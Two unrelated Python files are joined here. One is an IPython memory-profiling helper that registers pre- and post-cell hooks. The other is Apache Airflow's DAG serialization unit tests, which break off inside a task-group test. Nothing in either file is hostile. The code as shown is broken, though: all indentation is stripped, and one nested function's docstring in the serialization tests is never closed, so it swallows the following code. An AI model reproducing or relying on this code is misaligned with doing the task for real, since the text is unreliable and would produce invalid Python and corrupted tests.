ipython_memory_usage.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Profile mem usage envelope of IPython commands and report interactively"""
from __future__ import division # 1/2 == 0.5, as in Py3
from __future__ import absolute_import # avoid hiding global modules with locals
from __future__ import print_function # force use of print("hello")
from __future__ import unicode_literals # force unadorned strings "" to be unicode without prepending u""
import os
import time
import memory_profiler
from IPython import get_ipython
# To run: %run -i ipython_memory_usage.py
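# A minimal usage sketch (illustrative; not part of the original file): after the
# %run above, call start_watching_memory() to register the hooks defined below.
# Every subsequent cell then ends with a line rendered from ``output_template``, e.g.
#   In [3] used 40.1230 MiB RAM in 0.21s, peaked 0.00 MiB above current, total RAM usage 120.50 MiB
# (numbers made up). Call stop_watching_memory() to unregister the hooks again.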
# keep a global accounting for the last known memory usage
# which is the reference point for the memory delta calculation
previous_call_memory_usage = memory_profiler.memory_usage()[0]
t1 = time.time() # will be set to current time later
keep_watching = True
peak_memory_usage = -1
watching_memory = True
input_cells = get_ipython().user_ns['In']
def start_watching_memory():
"""Register memory profiling tools to IPython instance."""
global watching_memory
watching_memory = True
ip = get_ipython()
ip.events.register("post_run_cell", watch_memory)
ip.events.register("pre_run_cell", pre_run_cell)
def stop_watching_memory():
"""Unregister memory profiling tools from IPython instance."""
global watching_memory
watching_memory = False
ip = get_ipython()
try:
ip.events.unregister("post_run_cell", watch_memory)
except ValueError:
pass
try:
ip.events.unregister("pre_run_cell", pre_run_cell)
except ValueError:
pass
def watch_memory():
# bring in the global memory usage value from the previous iteration
global previous_call_memory_usage, peak_memory_usage, keep_watching, \
watching_memory, input_cells
new_memory_usage = memory_profiler.memory_usage()[0]
memory_delta = new_memory_usage - previous_call_memory_usage
keep_watching = False
peaked_memory_usage = max(0, peak_memory_usage - new_memory_usage)
# calculate time delta using global t1 (from the pre-run event) and current
# time
time_delta_secs = time.time() - t1
num_commands = len(input_cells) - 1
cmd = "In [{}]".format(num_commands)
# convert the results into a pretty string
output_template = ("{cmd} used {memory_delta:0.4f} MiB RAM in "
"{time_delta:0.2f}s, peaked {peaked_memory_usage:0.2f} "
"MiB above current, total RAM usage "
"{memory_usage:0.2f} MiB")
output = output_template.format(time_delta=time_delta_secs,
cmd=cmd,
memory_delta=memory_delta,
peaked_memory_usage=peaked_memory_usage,
memory_usage=new_memory_usage)
if watching_memory:
print(str(output))
previous_call_memory_usage = new_memory_usage
def during_execution_memory_sampler():
import time
import memory_profiler
global keep_watching, peak_memory_usage
peak_memory_usage = -1
keep_watching = True
n = 0
WAIT_BETWEEN_SAMPLES_SECS = 0.001
MAX_ITERATIONS = 60.0 / WAIT_BETWEEN_SAMPLES_SECS
while True:
mem_usage = memory_profiler.memory_usage()[0]
peak_memory_usage = max(mem_usage, peak_memory_usage)
time.sleep(WAIT_BETWEEN_SAMPLES_SECS)
if not keep_watching or n > MAX_ITERATIONS:
# exit if we've been told our command has finished or if it has run
# for more than a sane amount of time (e.g. maybe something crashed
# and we don't want this to carry on running)
if n > MAX_ITERATIONS:
print("{} SOMETHING WEIRD HAPPENED AND THIS RAN FOR TOO LONG, THIS THREAD IS KILLING ITSELF".format(__file__))
break
n += 1
def pre_run_cell():
"""Capture current time before we execute the current command"""
import time
global t1
t1 = time.time()
# start a thread that samples RAM usage until the current command finishes
import threading
ipython_memory_usage_thread = threading.Thread(target=during_execution_memory_sampler)
ipython_memory_usage_thread.daemon = True
ipython_memory_usage_thread.start()
test_dag_serialization.py
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import importlib
import importlib.util
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta, timezone
from glob import glob
from unittest import mock
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from parameterized import parameterized
from airflow.hooks.base import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator, BaseOperatorLink
from airflow.operators.bash import BashOperator
from airflow.security import permissions
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
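# Quick reference for the serialization round trip exercised throughout these tests
# (a summary of the calls used below, not part of the original file):
#   SerializedDAG.to_dict(dag)        # DAG -> JSON-serializable dict
#   SerializedDAG.validate_schema(d)  # validate the dict against the DAG JSON schema
#   SerializedDAG.from_dict(d)        # dict -> deserialized DAG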
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(
containers=[
k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")])
]
),
)
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {"__type": "timedelta", "__var": 300.0},
},
},
"start_date": 1564617600.0,
'_task_group': {
'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': [],
},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {
'__type': 'dict',
'__var': {
"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
},
},
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT],
}
},
},
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"depends_on_past": False,
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}},
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(
task_id='bash_task',
bash_command='echo {{ task.task_id }}',
owner='airflow',
executor_config={"pod_override": executor_config_pod},
)
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {'start_date': datetime(2019, 7, 10)}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={'hello': lambda name: 'Hello %s' % name},
catchup=False,
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=(
'{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}'
)
)
)
self.maxDiff = None # pylint: disable=invalid-name
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
self.assertTrue(json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py')
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed because the order of
items should not matter, but assertEqual would fail if the order of
items changed in the dag dictionary.
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
@pytest.mark.quarantined
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
self.assertTrue(isinstance(dag, DAG))
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags(
[
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
)
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually
'timezone',
# Need to check fields in it, to exclude functions
'default_args',
"_task_group",
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(
dag, field
), f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert (
v == serialized_dag.default_args[k]
), f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
# Verify that the deserialized DAG has a 'full_filepath' attribute
# and that it is equal to fileloc
assert serialized_dag.full_filepath == dag.fileloc
def validate_deserialized_task(
self,
serialized_task,
task,
):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type',
'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(
task, field
), f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for a deserialized task, task.subdag is None for all operators
# except SubDagOperator, where task.subdag is an instance of DAG
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
]
)
def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
self.assertNotIn("start_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("start_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.start_date, expected_task_start_date)
def test_deserialization_with_dag_context(self):
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag:
BaseOperator(task_id='simple_task')
# should not raise RuntimeError: dictionary changed size during iteration
SerializedDAG.to_dict(dag)
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
),
]
)
def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
self.assertNotIn("end_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("end_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.end_date, expected_task_end_date)
@parameterized.expand(
[
(None, None, None),
("@weekly", "@weekly", "0 0 * * 0"),
("@once", "@once", None),
({"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), timedelta(days=1)),
]
)
def test_deserialization_schedule_interval(
self, serialized_schedule_interval, expected_schedule_interval, expected_n_schedule_interval
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
self.assertEqual(dag.schedule_interval, expected_schedule_interval)
self.assertEqual(dag.normalized_schedule_interval, expected_n_schedule_interval)
@parameterized.expand(
[
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}),
]
)
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
self.assertDictEqual(serialized, expected)
round_tripped = SerializedDAG._deserialize(serialized)
self.assertEqual(val, round_tripped)
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"])
else:
self.assertNotIn("params", serialized_dag["dag"])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_dag.params)
self.assertEqual(expected_val, deserialized_simple_task.params)
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"]["tasks"][0])
else:
self.assertNotIn("params", serialized_dag["dag"]["tasks"][0])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_simple_task.params)
def test_extra_serialized_field_and_operator_links(self):
"""
Assert that the extra serialized field exists and that Operator Links defined in
Plugins as well as inbuilt Operator Links work.
This test also depends on GoogleLink() being registered as a plugin
in tests/plugins/test_plugin.py.
It verifies that if an extra operator link is registered by a plugin
via ``operator_extra_links`` and the same link is also defined on
the Operator in ``BaseOperator.operator_extra_links``, the correct
extra link is used.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), "true")
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[{'tests.test_utils.mock_operators.CustomOpLink': {}}],
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, ['Google Custom', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
self.assertEqual('http://google.com/custom_base_link?search=dummy_value_1', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
def test_extra_operator_links_logs_error_for_non_registered_extra_links(self):
"""
Assert that an OperatorLink that is neither registered via Plugins nor an inbuilt
Operator Link does not break deserialization of the DAG (no error is raised); it only logs an error.
"""
class TaskStateLink(BaseOperatorLink):
"""OperatorLink not registered via Plugins nor a built-in OperatorLink"""
name = 'My Link'
def get_link(self, operator, dttm):
return 'https://www.google.com'
class MyOperator(BaseOperator):
"""Just a DummyOperator using above defined Extra Operator Link"""
operator_extra_links = [TaskStateLink()]
def execute(self, context):
pass
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag:
MyOperator(task_id='blah')
serialized_dag = SerializedDAG.to_dict(dag)
with self.assertLogs("airflow.serialization.serialized_objects", level="ERROR") as log_output:
SerializedDAG.from_dict(serialized_dag)
received_logs = log_output.output[0]
expected_err_msg = (
"Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' "
"not registered"
)
assert expected_err_msg in received_logs
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert that the extra serialized field exists and that Operator Links defined in
Plugins as well as inbuilt Operator Links work.
This test also depends on GoogleLink() being registered as a plugin
in tests/plugins/test_plugin.py.
It verifies that if an extra operator link is registered by a plugin
via ``operator_extra_links`` and the same link is also defined on
the Operator in ``BaseOperator.operator_extra_links``, the correct
extra link is used.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), ["echo", "true"])
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
],
)
# Test all the extra_links are set
self.assertCountEqual(
simple_task.extra_links,
['BigQuery Console #1', 'BigQuery Console #2', 'airflow', 'github', 'google'],
)
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_1', custom_inbuilt_link)
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_2', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
class ClassWithCustomAttributes:
"""
Test helper class: allows creating objects with custom attributes in one single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return "{}({})".format(self.__class__.__name__, str(self.__dict__))
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
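# Illustrative usage of the helper above (not part of the original tests):
#   obj = ClassWithCustomAttributes(att1="x", template_fields=["att1"])
#   str(obj) == "ClassWithCustomAttributes({'att1': 'x', 'template_fields': ['att1']})"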
@parameterized.expand(
[
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(
nested1=ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
nested2=ClassWithCustomAttributes(
att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"]
),
template_fields=["nested1"],
),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': "
"'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
]
)
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exist for all Operators in a Serialized DAG.
Since we don't want to inflate arbitrary python objects (it poses an RCE/security risk etc.),
we check that non-"basic" objects are turned into strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
self.assertEqual(expected_field, getattr(deserialized_test_task, "bash_command"))
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in serialization need to be ignored
ignored_keys: set = {"is_subdag", "tasks"}
dag_params: set = set(dag_schema.keys()) - ignored_keys
self.assertEqual(set(DAG.get_serialized_fields()), dag_params)
def test_operator_subclass_changing_base_defaults(self):
assert (
BaseOperator(task_id='dummy').do_xcom_push is True
), "Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that no new fields have been added to BaseOperator. It is a reminder
that tests (and serialization support) should be added for any new field.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
self.assertEqual(
{
'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream',
},
fields,
"""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
""",
)
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
